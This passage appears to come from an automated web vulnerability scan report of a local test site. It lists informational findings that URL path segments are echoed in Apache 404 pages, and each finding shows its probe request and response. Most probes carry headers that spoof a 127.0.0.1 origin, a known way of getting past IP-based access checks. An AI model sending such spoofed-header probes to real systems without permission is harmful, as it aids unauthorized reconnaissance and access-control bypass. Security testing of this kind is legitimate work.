X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste34q51ys203/examplewebiste/includes/examplewebistepage.inc was not found on this server.</p>
...[SNIP]...
19.92. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/examplewebistepage.inc

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisterkgx8lpjvr/includes/examplewebistepage.inc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:01 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisterkgx8lpjvr/includes/examplewebistepage.inc was not found on this server.</p>
...[SNIP]...
19.93. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/examplewebistepage.inc

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes8rocrjx66t/examplewebistepage.inc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:13 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes8rocrjx66t/examplewebistepage.inc was not found on this server.</p>
...[SNIP]...
19.94. http://localhost/examplewebiste/examplewebiste/js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/jseyertcrp2a HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:32 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/jseyertcrp2a was not found on this server.</p>
...[SNIP]...
19.95. http://localhost/examplewebiste/examplewebiste/js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistebd3dvn979y/examplewebiste/js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:11 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistebd3dvn979y/examplewebiste/js was not found on this server.</p>
...[SNIP]...
19.96. http://localhost/examplewebiste/examplewebiste/js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistekypugdioxu/js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistekypugdioxu/js was not found on this server.</p>
...[SNIP]...
19.97. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistejt1eps7acj/examplewebiste/js/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistejt1eps7acj/examplewebiste/js/ was not found on this server.</p>
...[SNIP]...
19.98. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteuzzczrhn1y/js/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteuzzczrhn1y/js/ was not found on this server.</p>
...[SNIP]...
19.99. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/jslj812t3mwz/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:30 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/jslj812t3mwz/ was not found on this server.</p>
...[SNIP]...
19.100. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js/add_event_listenersbpsmindoi1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:44 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js/add_event_listenersbpsmindoi1 was not found on this server.</p>
...[SNIP]...
19.101. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteg5irh774ta/examplewebiste/js/add_event_listeners HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteg5irh774ta/examplewebiste/js/add_event_listeners was not found on this server.</p>
...[SNIP]...
19.102. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistevb5icadrh4/js/add_event_listeners HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistevb5icadrh4/js/add_event_listeners was not found on this server.</p>
...[SNIP]...
19.103. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js9l961y3mly/add_event_listeners HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js9l961y3mly/add_event_listeners was not found on this server.</p>
...[SNIP]...
19.104. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js/add_event_listeners.jsvckgpcf08o HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js/add_event_listeners.jsvckgpcf08o was not found on this server.</p>
...[SNIP]...
19.105. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteeitv2ifjtt/examplewebiste/js/add_event_listeners.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteeitv2ifjtt/examplewebiste/js/add_event_listeners.js was not found on this server.</p>
...[SNIP]...
19.106. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistempnnj3p10u/js/add_event_listeners.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistempnnj3p10u/js/add_event_listeners.js was not found on this server.</p>
...[SNIP]...
19.107. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/jsres3hq8ca6/add_event_listeners.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/jsres3hq8ca6/add_event_listeners.js was not found on this server.</p>
...[SNIP]...
19.108. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js/examplewebistePagej9rx3gct8a HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js/examplewebistePagej9rx3gct8a was not found on this server.</p>
...[SNIP]...
19.109. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteypbi56zb35/examplewebiste/js/examplewebistePage HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:55 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteypbi56zb35/examplewebiste/js/examplewebistePage was not found on this server.</p>
...[SNIP]...
19.110. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste6gijeixysh/js/examplewebistePage HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste6gijeixysh/js/examplewebistePage was not found on this server.</p>
...[SNIP]...
19.111. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/jsa0q4c4yuyk/examplewebistePage HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/jsa0q4c4yuyk/examplewebistePage was not found on this server.</p>
...[SNIP]...
19.112. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js/examplewebistePage.jsssqm0wgb6w HTTP/1.1
Host: localhost
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js/examplewebistePage.jsssqm0wgb6w was not found on this server.</p>
...[SNIP]...
19.113. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistezyx21jwwsn/examplewebiste/js/examplewebistePage.js HTTP/1.1
Host: localhost
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistezyx21jwwsn/examplewebiste/js/examplewebistePage.js was not found on this server.</p>
...[SNIP]...
19.114. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste5r30xl65yb/js/examplewebistePage.js HTTP/1.1
Host: localhost
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste5r30xl65yb/js/examplewebistePage.js was not found on this server.</p>
...[SNIP]...
19.115. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js7xiop4nkwl/examplewebistePage.js HTTP/1.1
Host: localhost
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js7xiop4nkwl/examplewebistePage.js was not found on this server.</p>
...[SNIP]...
19.116. http://localhost/examplewebiste/instructions [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/instructions

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/instructions21q5rcjig9 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
